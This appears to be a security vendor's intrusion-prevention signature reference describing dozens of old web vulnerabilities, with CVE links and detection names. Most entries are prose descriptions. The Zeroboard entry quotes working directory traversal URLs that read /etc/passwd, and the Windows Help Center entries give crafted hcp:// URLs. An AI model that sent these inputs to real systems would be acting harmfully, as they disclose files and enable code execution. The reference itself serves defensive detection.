HTTP_CRL-Webgais-Cgi-System-Compromise

References:

CVE-1999-0176
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0176

BID-2058
http://www.securityfocus.com/bid/2058

HTTP-WebHints-Command-Execution

About this vulnerability:

Command execution vulnerability in WebHints

Risk:

Moderate

First detected in:

sgpkg-ips-29-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

WebHints

Type:

Metacharacter

Description:

WebHints allows you to set up a "Hint (Quote/Tip/Joke) of the Day" page. Script hints.pl in WebHints contains a vulnerability in the argument handling. Remote attackers can exploit this vulnerability to execute arbitrary commands via shell metacharacters.

Situation:

HTTP_CSU-WebHints-Command-Execution

References:

CVE-2005-1950
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1950

BID-13930
http://www.securityfocus.com/bid/13930

HTTP-Websendmail-Cgi-System-Compromise

About this vulnerability:

Websendmail.cgi command execution vulnerability

Risk:

High

First detected in:

sgpkg-ips-4-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

WebGAIS

Type:

Malfunction

Description:

Websendmail, a cgi script that comes with the WEBgais package, does not validate input sent as the receiver argument. Remote attackers may execute arbitrary commands as the web server by passing suitable arguments to the script.

Situation:

HTTP_CRL-Websendmail-Cgi-System-Compromise

References:

CVE-1999-0196
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0196

BID-2063
http://www.securityfocus.com/bid/2063

OSVDB-237
http://www.osvdb.org/237

HTTP-Website-Uploader-Exe-File-Import

About this vulnerability:

Uploader.exe allows arbitrary file uploading in WebSite.

Risk:

Moderate

First detected in:

sgpkg-ips-5-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

O'Reilly Software WebSite

Type:

Malfunction

Description:

Uploader.exe included with the O'Reilly Website does not check any input. This allows remote user to upload any file to cgi-win directory of the host, and can be exploited by uploading and executing malicious scripts on the host.

Situation:

HTTP_CSU-Website-Uploader-Exe-File-Import

References:

CVE-1999-0177
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0177

HTTP-Website-Win-C-Sample-Exe-BOF

About this vulnerability:

Buffer overflow in sample win-c-sample.exe

Risk:

High

First detected in:

sgpkg-ips-2-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

O'Reilly Software WebSite

Type:

Buffer Overflow

Description:

A buffer-overflow vulnerability exists in a sample script from WebSite, win-c-sample.exe. Exploiting the vulnerability allows arbitrary command execution as the server process on the host.

Situation:

HTTP_CSU-Website-Win-C-Sample-Exe-BOF

References:

CVE-1999-0178
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0178

BID-2078
http://www.securityfocus.com/bid/2078

OSVDB-8
http://www.osvdb.org/8

HTTP-WebsitePro-Path-Disclosure

About this vulnerability:

Web document-path disclosure.

Risk:

Low

First detected in:

sgpkg-ips-15-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

O'Reilly Software WebSite

Type:

Malfunction

Description:

An attacker can disclose the exact path of a web document by issuing a crafted request.

Situation:

HTTP_CS-WebsitePro-Path-Disclosure

References:

CVE-2000-0066
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0066

BID-932
http://www.securityfocus.com/bid/932

HTTP-Webstore-Ws-Mail-Cgi-System-Compromise

About this vulnerability:

System-compromising vulnerability in ws_mail.cgi

Risk:

High

First detected in:

sgpkg-ips-3-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

cgiCentral WebStore 400

Type:

Malfunction

Description:

Webstore 400 is an online shopping-cart application. Webstore includes the cgi script ws_mail.cgi, which does not sufficiently validate input. Remote attackers may execute arbitrary commands on the server by passing suitable arguments to the scripts kill - parameter. Administrator privileges in Webstore are required to use ws_mail.cgi.

Situation:

HTTP_CRL-Webstore-Ws-Mail-Cgi-System-Compromise

References:

CVE-2001-1343
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1343

BID-2861
http://www.securityfocus.com/bid/2861

HTTP-Wguest-Rguest-Exe-File-Disclosure

About this vulnerability:

File-disclosure vulnerability in both rguest.exe and wguest.exe

Risk:

Low

First detected in:

sgpkg-ips-3-1102

Last changed:

sgpkg-ips-1637-5242

Platform:

Generic

Software:

Webcom Datakommunikation Guestbook

Type:

Metacharacter Injection

Description:

The Webcom Datakommunikation Guestbook 0.1 comes with two vulnerable files, wguest.exe and rguest.exe. Both allow remote users to view arbitrary files from the host, and can be exploited by a path and filename as the parameter.

References:

CVE-1999-0467
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0467

BID-2024
http://www.securityfocus.com/bid/2024

HTTP-Whisker-Vulnerability-Scanner

About this vulnerability:	Whisker Vulnerability Scanner
Risk:	Low
First detected in:	sgpkg-ips-1-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Generic HTTP server
Type:	Malfunction
Description:	A possible attacker can use Whisker (a vulnerability scanner) to scan known CGI vulnerabilities in web servers.
Situation:	HTTP_CS-Whisker-Scan-Detect HTTP_CSH-LibWhisker-Nikto-Scan-Detect

HTTP-Whois-Raw-Cgi-System-Compromise

About this vulnerability:

Insufficient-argument parsing in whois_raw.cgi.

Risk:

High

First detected in:

sgpkg-ips-3-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

CDomain CDomainfree

Type:

Malfunction

Description:

A vulnerability in CDomainfrees whois_raw.cgi allows remote attackers to execute arbitrary commands on the server by passing suitable arguments to the fqdn parameter.

Situation:

HTTP_CRL-Whois-Raw-Cgi-System-Compromise

References:

CVE-1999-1063
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1063

BID-304
http://www.securityfocus.com/bid/304

HTTP-Windmail-File-Disclosure

About this vulnerability:

Windmail File Disclosure

Risk:

High

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1636-5242

Platform:

Windows

Software:

WindMail; Generic HTTP server

Type:

Misconfiguration

Description:

The Windmail command line application, when operating as a part of a form-mail capable web page, can be used to send any file on the system to the attacker.

References:

CVE-2000-0242
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0242

BID-1073
http://www.securityfocus.com/bid/1073

HTTP-Windows-Help-And-Support-Center-Hcp-Url-System-Compromise

About this vulnerability:

Windows Help and Support Center allows remote attackers to execute arbitrary code

Risk:

High

First detected in:

sgpkg-ips-9-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Help and Support Center

Type:

Malfunction

Description:

The HSC (Help and Support Center) installation contains various HTML and javascript files belonging to the "My Computer" zone. Remote attackers can exploit this by tricking a victim to visit the URL "HCP://system/DVDUpgrd/dvdupgrd.htm", which initiates the Dvdupgrade action and allows attackers to run scripts in the "My Computer" zone.

Situation:

HTTP_Windows-Help-And-Support-Center-Hcp-Url-System-Compromise
File-Text_Windows-Help-And-Support-Center-Hcp-Url-System-Compromise

References:

CVE-2004-0199
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0199

BID-10321
http://www.securityfocus.com/bid/10321

MS04-015
http://technet.microsoft.com/security/bulletin/MS04-015

HTTP-Windows-Help-And-Support-Center-Hcp-Url-System-Compromise-MS04-011

About this vulnerability:

Help and Support Center in Microsoft Windows validates improperly HCP URLs

Risk:

High

First detected in:

sgpkg-ips-418-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Help and Support Center

Type:

Buffer Overflow

Description:

Some versions of Microsoft Windows could allow a remote attacker to execute arbitrary code on the system due to improper validation of Help Center and Support (HCP) URLs. A remote attacker could execute arbitrary code on the victim's computer by creating a specially-crafted hcp:// URL with quotatio marks. The code is executed with the victim's privileges when the link is accessed. The attacker could exploit this vulnerability by creating a malicious Web page and hosting it on a Web site, or by sending it to a victim as an HTML e-mail.

Situation:

File-Text_Windows-Help-And-Support-Center-Hcp-Url-System-Compromise-MS04-011

References:

CVE-2003-0907
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0907

BID-10119
http://www.securityfocus.com/bid/10119

OSVDB-5253
http://www.osvdb.org/5253

MS04-011
http://technet.microsoft.com/security/bulletin/MS04-011

HTTP-Windows-Helpctr-Exe-Hcp-Url-System-Compromise

About this vulnerability:

Windows Help and Support Center allows remote attackers to execute arbitrary code

Risk:

High

First detected in:

sgpkg-ips-9-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Help and Support Center

Type:

Malfunction

Description:

Help Center in Windows XP, HelpCtr.exe, allows attackers to read and execute arbitrary files. Remote attackers can exploit the vulnerability by tricking the victim to open a link pointing to "hcp://services/layout/contentonly?topic=XXX", where XXX is a URL.

Situation:

HTTP_Windows-Helpctr-Exe-Hcp-Url-System-Compromise
HTTP_SHS-Windows-Helpctr-Exe-Hcp-Url-System-Compromise

References:

CVE-2004-0474
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0474

BID-9621
http://www.securityfocus.com/bid/9621

HTTP-Windows-Media-Player-Plugin-Embed-Src-Buffer-Overflow

About this vulnerability:

Windows Media Player Plug-in long SRC in HTML embed tag buffer overflow (MS06-005

Risk:

High

First detected in:

sgpkg-ips-60-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Windows Media Player

Type:

Buffer Overflow

Description:

Windows Media Player provides a plug-in to be used with web browsers for viewing content that Media Player can display. Resources requiring plug-ins can be embedded into HTML pages via a "embed" HTML tag. The Windows Media Players plug-in suffers from a vulnerability where a long SRC value in an embed tag will cause a buffer overflow and allow arbitrary code execution.

Situation:

HTTP_Windows-Media-Player-Plugin-Embed-Src-Buffer-Overflow
File-Text_Windows-Media-Player-Plugin-Embed-Src-Buffer-Overflow

References:

CVE-2006-0005
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0005

BID-16644
http://www.securityfocus.com/bid/16644

MS06-006
http://technet.microsoft.com/security/bulletin/MS06-006

HTTP-Windows-Media-Player-PNG-Processing-Integer-Overflow

About this vulnerability:

Integer overflow vulnerability in the processing of PNG images in Windows Media Player

Risk:

High

First detected in:

sgpkg-ips-63-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Windows Media Player

Type:

Buffer Overflow

Description:

Windows Media Player 9 has a vulnerability in the processing of PNG images. The application uses picture's 'width' and 'height' information to calculate various buffer sizes. If the values of these parameters are large enough, it is possible that an integer overflow occurs before the buffers are allocated. This results in buffers that are too small. When data is copied into these buffers, a buffer overflow condition will occur. A remote attacker is able to exploit this vulnerability to execute arbitrary code on the victim machine.

Situation:

HTTP_PNG-Image-With-Large-Height-Or-Width-Value
File-PNG_PNG-Image-With-Large-Height-Or-Width-Value

References:

CVE-2004-1244
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1244

BID-12485
http://www.securityfocus.com/bid/12485

MS05-009
http://technet.microsoft.com/security/bulletin/MS05-009

HTTP-Winhlp32-Item-Buffer-Overflow

About this vulnerability:

Buffer overflow in Item parameter of Winhlp32

Risk:

High

First detected in:

sgpkg-ips-7-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Buffer Overflow

Description:

The WinHlp command has a buffer overflow vulnerability in the handling of Item parameter. A remote attacker can use this vulnerability to execute arbitrary code on the victim host.

Situation:

HTTP_Winhlp32-Item-Buffer-Overflow
File-Text_Microsoft-Windows-Winhlp32-Item-Buffer-Overflow

References:

CVE-2002-0823
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0823

BID-4857
http://www.securityfocus.com/bid/4857

OSVDB-2991
http://www.osvdb.org/2991

HTTP-WinZip-FileView-ActiveX-Control-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in WinZip

Risk:

High

First detected in:

sgpkg-ips-85-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

WinZip

Type:

Buffer Overflow

Description:

WinZip has a stack-based buffer overflow vulnerability. A target user with a vulnerable version of the affected product can be persuaded to visit a malicious web page containing an excessively long value assigned to the FilePattern property of the FileView object. This leads to a DoS or code execution with the privileges of the currently logged in user.

Situation:

HTTP_WinZip-FileView-ActiveX-Control-Buffer-Overflow
File-Text_WinZip-FileView-ActiveX-Control-Buffer-Overflow

References:

CVE-2006-5198
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5198

BID-21060
http://www.securityfocus.com/bid/21060

OSVDB-30433
http://www.osvdb.org/30433

MS06-067
http://technet.microsoft.com/security/bulletin/MS06-067

HTTP-Word-Doc-Using-Ie

About this vulnerability:	Word Document containing reference to mshtml.dll
Risk:	Moderate
First detected in:	sgpkg-ips-208-2032
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Browser
Description:	A reference to mshtml.dll has been detected. This can be used to make an office document download and render html code via Internet Explorer even if Internet Explorer is not the default Internet Browser. Attacker can use this to exploit IE bugs and gain remote access.
Situation:	HTTP_SS-Reference-To-Ie-Rendering-Engine

HTTP-WS-FTP-Pro-Ini-File-Weak-Encryption

About this vulnerability:

WS_FTP Pro Ini File Weak Encryption

Risk:

Moderate

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1636-5242

Platform:

Generic

Software:

WS_FTP Professional; WS_FTP Home

Type:

Misconfiguration

Description:

Passwords can be stored in ini files of the WS_FTP, but their encryption is weak.

References:

CVE-1999-1078
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1078

BID-547
http://www.securityfocus.com/bid/547

HTTP-WWW-File-Share-Pro-Directory-Traversal

About this vulnerability:

WWW File Share Pro allows users to create or overwrite arbitrary files on the server.

Risk:

Moderate

First detected in:

sgpkg-ips-9-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

WWW File Share Pro

Type:

Directory Traversal

Description:

WWW File Share Pro is a small HTTP server that allows users to upload and download files. The server allows remote attackers to create or overwrite arbitrary files with '../' sequences in the filename parameter of a Content-Disposition header.

Situation:

HTTP_CSH-File-Name-Directory-Traversal

References:

CVE-2004-0059
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0059

HTTP-WWWBoard-Password-Disclosure

About this vulnerability:

Password-disclosure vulnerability in WWWBoard

Risk:

Moderate

First detected in:

sgpkg-ips-2-1102

Last changed:

sgpkg-ips-1637-5242

Platform:

Generic

Software:

Matt Wright WWWBoard

Type:

Insecure Configuration

Description:

By default, WWWBoard stores the admin password into file 'passwd.txt' under the web root. A remote attacker can download the file and use a brute force attack against the password.

References:

CVE-1999-0953
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0953

BID-649
http://www.securityfocus.com/bid/649

HTTP-Xylogics-Annex-Ping-BOF

About this vulnerability:

Xylogics Annex Ping Buffer Overflow

Risk:

Low

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1636-5242

Platform:

Generic

Software:

Xylogics Annex

Type:

Buffer Overflow

Description:

The Xylogics Annex terminal services ping CGI contains a buffer overflow vulnerability when handling the query parameter. This vulnerability could be exploited to cause a denial of service.

References:

CVE-1999-1070
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1070

HTTP-Yahoo-Audio-Conferencing-ActiveX-Control-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in the Yahoo! Audio Conferencing ActiveX control

Risk:

Moderate

First detected in:

sgpkg-ips-70-1314

Last changed:

sgpkg-ips-1400-5242

Platform:

Generic

Software:

Yahoo Messenger; Yahoo Chat

Type:

Buffer Overflow

Description:

The Yahoo! Audio Conferencing ActiveX control used in Yahoo! Messenger and Yahoo! Chat has a buffer overflow vulnerability in the handling of a long hostname parameter. A remote attacker is able to exploit this vulnerability to execute arbitrary code on the victim host.

Situation:

HTTP_Yahoo-Audio-Conferencing-ActiveX-Control-Buffer-Overflow

References:

CVE-2003-1129
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1129

BID-7561
http://www.securityfocus.com/bid/7561

OSVDB-4651
http://www.osvdb.org/4651

HTTP-Yahoo-Messenger-AudioConf-ActiveX-Control-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in the AudioConf ActiveX control component of Yahoo! Messenger

Risk:

Moderate

First detected in:

sgpkg-ips-104-1314

Last changed:

sgpkg-ips-1555-5242

Platform:

Windows

Software:

Yahoo Messenger

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in the AudioConf ActiveX control component of Yahoo! Messenger. When a crafted HTML page that contains an excessively long string assignment to the Hostname property and a function call to the createAndJoinConference method is viewed by a target user, arbitrary code can be executed with the user's privileges.

Situation:

HTTP_SS-Yahoo-Messenger-AudioConf-ActiveX-Control-Buffer-Overflow

References:

CVE-2007-1680
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1680

BID-23291
http://www.securityfocus.com/bid/23291

OSVDB-34319
http://www.osvdb.org/34319

HTTP-Yahoo-Messenger-YMailAttach-ActiveX-Buffer-Overflow

About this vulnerability:

Yahoo Messenger YMailAttach ActiveX buffer overflow vulnerability

Risk:

High

First detected in:

sgpkg-ips-90-1314

Last changed:

sgpkg-ips-1400-5242

Platform:

Generic

Software:

Yahoo Messenger

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Yahoo! Messenger. The vulnerability is caused by improper usage of the the YMailAttach ActiveX control. A remote attacker may exploit this vulnerability to inject and execute arbitrary code on the target host in the context of the currently logged in user.

Situation:

HTTP_Yahoo-Messenger-YMailAttach-ActiveX-Control-Buffer-Overflow

References:

CVE-2006-6603
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6603

BID-21607
http://www.securityfocus.com/bid/21607

HTTP-Zeroboard-Dir-Parameter-Php-Code-Injection

About this vulnerability:

Multiple scripts in Zeroboard allow arbitrary php code injection

Risk:

High

First detected in:

sgpkg-ips-19-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Zeroboard

Type:

PHP Injection

Description:

Multiple scripts in Zeroboard allow PHP source injection by defining a 'dir' parameter that points to a malicious php file. Error.php, login.php, setup.php and ask_password.php all include the file '$dir/value.php3'. A successful exploit allows remote attackers to execute arbitrary php code on the server.

Situation:

HTTP_CRL-Zeroboard-Dir-Parameter-Php-Code-Injection

References:

CVE-2005-0380
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0380

BID-12206
http://www.securityfocus.com/bid/12206

OSVDB-12929
http://www.osvdb.org/12929

OSVDB-12932
http://www.osvdb.org/12932

OSVDB-12931
http://www.osvdb.org/12931

OSVDB-12930
http://www.osvdb.org/12930

OSVDB-12928
http://www.osvdb.org/12928

HTTP-Zeroboard-Multiple-File-Disclosure

About this vulnerability:

Three Zeroboard scripts show arbitrary files

Risk:

Moderate

First detected in:

sgpkg-ips-19-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Zeroboard

Type:

Directory Traversal

Description:

Head.php, include/write.php and outlogin.php in Zeroboard allow directory traversal. By accessing URLs such as "_head.php?_zb_path=../../../../../etc/passwd%00", "include/write.php?dir=../../../../../etc/passwd%00" and "outlogin.php?_zb_path=../../../../../etc/passwd%00", remote attackers can view arbitrary files on the server.

Situation:

HTTP_CSU-Zeroboard-Multiple-File-Disclosure

References:

CVE-2005-0379
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0379

BID-12257
http://www.securityfocus.com/bid/12257

HTTP-Zeroboard-Print-Category-Php-Dir-Parameter-Php-Code-Injection

About this vulnerability:

Zeroboard's Print_category.php allows arbitrary php code injection

Risk:

High

First detected in:

sgpkg-ips-19-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Zeroboard

Type:

PHP Injection

Description:

Print_category.php in Zeroboard allows PHP source injection by defining a 'dir' parameter that points to a malicious php file. Print_category.php includes the file "$dir/category_head.php", and a successful exploit allows remote attackers to execute arbitrary php code on the server.

Situation:

HTTP_CRL-Zeroboard-Print-Category-Php-Dir-Parameter-Php-Code-Injection

References:

CVE-2005-0380
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0380

BID-12258
http://www.securityfocus.com/bid/12258

OSVDB-12929
http://www.osvdb.org/12929

OSVDB-12932
http://www.osvdb.org/12932

OSVDB-12931
http://www.osvdb.org/12931

OSVDB-12930
http://www.osvdb.org/12930

OSVDB-12928
http://www.osvdb.org/12928

HTTP-ZmEu-Scanner

About this vulnerability:	ZmEu Scanner Attack Tool
Risk:	Moderate
First detected in:	sgpkg-ips-505-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	ZmEu
Type:	Browser
Description:	ZmEu Scanner is an attack tool that is designed to exploit website-related vulnerabilities. ZmEu can be identified by HTTP User-Agent header containing "ZmEu".
Situation:	HTTP_CSH-ZmEu-Scanner-Usage

HTTP8080-RealServer-ViewSource-DoS

About this vulnerability:

Denial-of-Service vulnerability in Real Networks Real Server

Risk:

Moderate

First detected in:

sgpkg-ips-58-1210

Last changed:

sgpkg-ips-1637-5242

Platform:

Generic

Software:

RealNetworks Real Server

Type:

Malfunction

Description:

Real Networks' Real Server crashes after handling requests for a page in the 'viewsource' directory. Attacker can cause denial of service by exploiting this vulnerability.

References:

CVE-2000-0474
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0474

BID-1288
http://www.securityfocus.com/bid/1288

HTTPDX-HTTP-Server-1.4-Stack-Based-Buffer-Overflow

About this vulnerability:

HTTPDX HTTP Server 1.4 Stack Based Buffer Overflow

Risk:

High

First detected in:

sgpkg-ips-654-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

HTTPDX HTTP Server

Type:

Buffer Overflow

Description:

An stack based buffer overflow vulnerability in HTTPDX HTTP Server 1.4 which allows attackers to remotly execute arbitrary code via a long HTTP GET request.

Situation:

HTTP_CSU-HTTPDX-HTTP-Server-1.4-Stack-Based-Buffer-Overflow

References:

CVE-2009-3711
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3711

OSVDB-58714
http://www.osvdb.org/58714

HTTPDX-TOLOG-Function-Format-String

About this vulnerability:

An HTTPDX TOLOG Function Format String vulnerability.

Risk:

High

First detected in:

sgpkg-ips-758-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows XP SP3

Software:

HTTPDX HTTP Server

Type:

Format String

Description:

Multiple vulnerabilities in HTTPDX HTTP Server, versions 1.4, 1.4.5, 1.4.6, 1.4.6b, and 1.5, which allow remote attackers to execute arbitrary code via format string specifiers in a GET request to the HTTP server component and in a PWD command to the FTP server component.

Situation:

HTTP_CSU-HTTPDX-TOLOG-Function-Format-String
FTP_CS-HTTPDX-TOLOG-Function-Format-String

References:

CVE-2009-4769
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4769

OSVDB-60181
http://www.osvdb.org/60181

Httper

About this vulnerability:	HTTPER
Risk:	Low
First detected in:	sgpkg-ips-616-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	HTTPER
Type:	Misconfiguration
Description:	HTTPER is an adware. It is not a virus or a Trojan, however it is considered a potentially unwanted program.
Situation:	HTTP_CSH-Httper

HTTPS-Joost-Usage

About this vulnerability:	Detects Joost usage
Risk:	Low
First detected in:	sgpkg-ips-109-2032
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Joost
Type:	Peer-to-Peer
Description:	Detects Joost usage.
Situation:	HTTPS_SS-Joost-Usage

HTTPS-Microsoft-Schannel-Security-Package-Compromise

About this vulnerability:

Remote code execution vulnerability in Microsoft Schannel Security Package

Risk:

High

First detected in:

sgpkg-ips-111-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2000;Windows XP;Windows 2003

Software:

<os>

Type:

Buffer Overflow

Description:

Microsoft Schannel SSL client does not handle invalid SSL ServerKeyExchange messages correctly. A malicious SSL server can use a specially crafted handshake message to execute arbitrary code on vulnerable SSL clients connecting to it.

Situation:

HTTPS_SS-Microsoft-Schannel-Security-Package-Compromise

References:

CVE-2007-2218
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2218

BID-24416
http://www.securityfocus.com/bid/24416

MS07-031
http://technet.microsoft.com/security/bulletin/MS07-031

HTTP_Akamai-Download-Manager-ActiveX-Buffer-Overflow

About this vulnerability:

A vulnerability in Akamai download ActiveX control

Risk:

High

First detected in:

sgpkg-ips-140-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Akamai Download Manager

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability exists in Akamai Download Manager ActiveX control. A remote attacker can exploit this vulnerability by enticing the target user to open a malicious webpage, potentially allowing arbitrary code to be injected and executed in the security context of the currently logged in user.

Situation:

HTTP_Akamai-Download-Manager-BOF
File-Text_Akamai-Download-Manager-BOF

References:

CVE-2007-1891
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1891

BID-23522
http://www.securityfocus.com/bid/23522

OSVDB-34323
http://www.osvdb.org/34323

HTTP_Binary-In-User-Agent-String

About this vulnerability:	Binary in User-Agent
Risk:	Moderate
First detected in:	sgpkg-ips-180-2032
Last changed:	sgpkg-ips-1296-5242
Platform:	Any Operating System
Software:	<os>
Type:	Code Injection
Description:	The User-Agent field in a http request header is used to identify the web client application. This field is usually written in Ascii range of characters and contains often values like: "User-Agent: Mozilla/4\.0". The User-Agent field may also be used within attempts to obfuscate logs in the http server or in storing a shellcode that is used within an exlpoit attempt. Having binary in the user-agent field does not indicate that the webserver is vulnerable or compromised, but it may indicate that an attack is going on.
Situation:	HTTP_CSH-ShellCode-In-User-Agent

HTTP_Cisco-Secure-Access-Control-Server-UCP-Application-CSuserCGI.exe-BOF

About this vulnerability:

A buffer overflow vulnerability in the Cisco User-Changeable Password (UCP) application

Risk:

High

First detected in:

sgpkg-ips-149-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Cisco Systems UCP

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in the Cisco User-Changeable Password (UCP) application. The vulnerability can be triggered by sending an HTTP GET request with an excessively long argument as the Serial string in the Logout action to the vulnerable server, causing a denial of service condition or allowing execution of arbitrary code with the privileges of the affected product.

Situation:

HTTP_CRL-Cisco-Secure-Access-Control-Server-UCP-Application-CSuserCGI.exe-BOF

References:

CVE-2008-0532
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0532

BID-28222
http://www.securityfocus.com/bid/28222

OSVDB-42961
http://www.osvdb.org/42961

HTTP_CRL-Amadey-Bot-Infection-Traffic

About this vulnerability:	Amadey Bot infection traffic was detected
Risk:	High
First detected in:	sgpkg-ips-1276-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	Amadey Bot infection traffic was detected.
Situation:	HTTP_CRL-Amadey-Bot-Infection-Traffic

HTTP_CRL-NetGear-WNR2000v5-Remote-Code-Execution-CVE-2016-10174

About this vulnerability:

A vulnerability in NetGear WNR2000v5

Risk:

High

First detected in:

sgpkg-ips-1485-5242

Last changed:

sgpkg-ips-1485-5242

Platform:

Generic

Software:

NetGear

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability has been reported in the Netgear WNR2000v5 routers. A remote, unauthenticated attacker can use this vulnerability to execute arbitrary code via the hidden_lang_avi parameter.

Situation:

HTTP_CRL-NetGear-WNR2000v5-Remote-Code-Execution-CVE-2016-10174

References:

CVE-2016-10174
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10174

HTTP_CSU-Apple-Software-Update-Catalog-Filename-Format-String

About this vulnerability:

Format string vulnerability in Apple Software Update Catalog

Risk:

High

First detected in:

sgpkg-ips-132-2032

Last changed:

sgpkg-ips-1555-5242

Platform:

Mac OS X

Software:

<os>

Type:

Format String

Description:

There is a format string vulnerability in Apple Software Update, included in the Apple Mac OS X operating system. The vulnerability is due to insufficient input validation when handling filenames in the update software. The vulnerability may allow arbitrary code execution in the context of the current user.

References:

CVE-2007-0463
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0463

BID-22222
http://www.securityfocus.com/bid/22222

OSVDB-32703
http://www.osvdb.org/32703

HTTP_CSU-RIG-EK-Traffic-Pattern

About this vulnerability:	Traffic resembling RIG Exploit Kit was detected
Risk:	High
First detected in:	sgpkg-ips-1038-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Javascript Injection
Description:	RIG Exploit Kit traffic was detected. An exploit kit is a platform, which can automatically exploit user's computer when infected website is visited.
Situation:	HTTP_CSU-RIG-EK-Traffic-Pattern

HTTP_FunWebProducts-mywebsearch

About this vulnerability:	FunWebProducts mywebsearch Toolbar
Risk:	Low
First detected in:	sgpkg-ips-224-3038
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Mywebsearch
Type:	Misconfiguration
Description:	mywebseach is an Internet Explorer toolbar that may show advertisements. Some organizations may consider the mywebsearch software unwanted.
Situation:	HTTP_CSH-FunWebProducts-mywebsearch-Toolbar

HTTP_GoAhead-Webserver-Deep-Path-Buffer-Overflow

About this vulnerability:

A buffer overflow vulnerability in GoAhead Webserver allows remote code execution

Risk:

High

First detected in:

sgpkg-ips-139-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

GoAhead Webserver

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability exists in GoAhead Webserver 2.1. The vulnerability can be triggered by sending a GET request containing a deep path.

Situation:

HTTP_CS-GoAhead-Deep-Directory-BOF

References:

CVE-2002-1951
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1951

BID-5464
http://www.securityfocus.com/bid/5464

